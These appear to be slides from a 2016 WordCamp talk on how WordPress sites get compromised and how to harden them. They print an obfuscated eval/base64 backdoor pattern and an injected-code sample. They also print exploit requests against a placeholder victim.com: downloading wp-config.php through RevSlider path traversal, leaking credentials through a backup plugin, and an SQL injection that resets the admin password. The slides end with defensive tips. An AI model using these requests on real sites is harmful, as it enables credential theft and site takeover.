Slides from my talk at WordCamp Portugal 2016 about hellodev's experience with self-hosted WordPress websites and the security issues around them. Tips and other useful information inside.
4.
/* Primeiros contactos com sites
comprometidos */
-rw-r--r-- 1 root root 3012 May 11 09:59 index.php
/* Source: Wordfence March 2016 */
5.
/* Primeiros contactos com sites
comprometidos */
<?php
// Silence is golden.
6.
/* Primeiros contactos com sites
comprometidos */
<?php
// Silence is golden.
$x =“NFbkn
veorgASDgaskdhfkashdfpwehibvasipdhvaipegaiweHFAPEIgaPIyeiaaipwehgwEG
$34h293gHW)EHG(QHgQ(WEGH#$)GhQªGH)EHGQ3223nfk2n3f23nçkfn2ç34”;
$r=eval(gzinflate(str_rot13(base64_decode($x))));
7.
/* Como uma instalação de
WordPress pode ser
comprometida */
// RESPONSIBLE FOR 70% OF THE ATTACKS
$first = "plugin";
$second = "brute force";
// OTHER 30%
$other = array("code", "theme", "hosting", "file permissions");
/* Source: Wordfence March 2016 */
8.
/* O que fazem depois? */
// MOST OF THEM
$first_choice = "deface or take offline";
$second_choice = "send spam";
$third_choice = "seo spam";
$other = "redirect";
/* Source: Wordfence March 2016 */
9.
/* Site comprometido por um
plugin */
// MOST COMMON METHOD
$using_method = "Local File Inclusion (LFI) attack.";
// EXAMPLE - INJECTED CODE
<?php ${“Gx4cOx42x41x4cx53"}["x69wirx72x63x66x76"]="x69";${"x47Lx4fx42ALx53"}
["x61rx6bmx64z"]="mx6bx41x72r";${"x47x4cOx42x41x4cS"}["ex6ax71x68x68j
x6c"]="x6dx6bx5ftx65x6dp";${"GLOx42x41x4cx53"}["x72x66lx73x65x76x68m
x67x68x79"]="x73tx72x69x70Ax72x72";${"Gx4cx4fx42x41x4cx53"}["v
x72x72x71x78x6dx6dx77y"]="x63ax74x5fcross";${"x47x4cx4fx42ALx53"}
["x72x73x77x70x61x6cx78tx62x79n"]="tex6dx70lx61te";${"GLx4fx42Ax4cx53"}["g
x78x67ycx74x71x73"]="tx69tlx65"; ?>
10.
/* Site comprometido por um
plugin */
// EXAMPLE - DOWNLOAD WP-CONFIG.PHP FILE - REVSLIDER
$wpconfig_content = file_get_contents(“http://victim.com/wp-admin/admin-
ajax.php?action=revslider_show_image&img=../wp-config.php”);
/* Source: http://finalphoenix.me/ */
11.
/* Site comprometido por um
plugin */
// EXAMPLE - PHPINFO WITH CONSTANTS OR DOWNLOADING BACKUPS OR
UPLOADING FILES
$nonce = file_get_contents(“http://victim.com/wp-admin/admin.php?
action=upgrade-plugin”);
$credentials = file_get_contents(“http://victim.com/wp-admin/admin.php?
action=updraft_ajax_handler&nonce=$nonce”);
/* Source: http://finalphoenix.me/ */
12.
/* Site comprometido por um
plugin */
// EXAMPLE - EXECUTING SCRIPTS
$script_to_execute =“phpinfo()”;
$content_of_phpinfo = file_get_contents(“http://victim.com/wp-admin/
admin-post.php?action=wp_ajax_easymedia_imgresize_ajax?imgurl=
$script_to_execute”);
/* Source: http://finalphoenix.me/ */
13.
/* Site comprometido por um
plugin */
// EXAMPLE - DATABASE INJECTION (MISSING ASCII TO HTML CODE CONVERSION)
$context = …
$query_to_inject =“update wp_users set password=md5(‘123’) where id=1”;
$chage_password = file_get_contents(“http://victim.com/wp-admin/admin.php?
page=aiowpsec&tab=tab1&orderby=$query_to_inject”, false, $context);
/* Source: http://finalphoenix.me/ */
14.
/* Site comprometido por um
plugin */
// HOW TO PROTECT AGAINST ATTACKS THROUGH PLUGINS?
$simple_solution = "update, update, update!";
$other_tips = array("don't use old plugins", "search for news about security issues", "take a look at the code");
15.
/* Site comprometido por brute
force */
// PASSWORD GUESSING ATTACK
$tips = array("don't use obvious usernames", "don't use simple passwords", "create a new admin account");
$how_to_avoid = "two factor authentication";
$other_solution = array("change /wp-admin", "blacklist IPs trying to login and failing for more than x times");
16.
/* Site comprometido por outros
motivos */
// SET THE CORRECT PERMISSIONS
$folders = "0755";
$files = "0644";
$wp_config = "0444";
$htaccess = "0444";
17.
/* Site comprometido por outros
motivos */
// SET THE CORRECT .HTACCESS CONTENT
$things_you_can_do = array("block IPs", "protect files", "allow certain file extensions from wp_content/*");
18.
/* Site comprometido por outros
motivos */
// HAVE LATEST OS UPDATES INSTALLED
if ($i_have_a_server() == true) { update_os(); }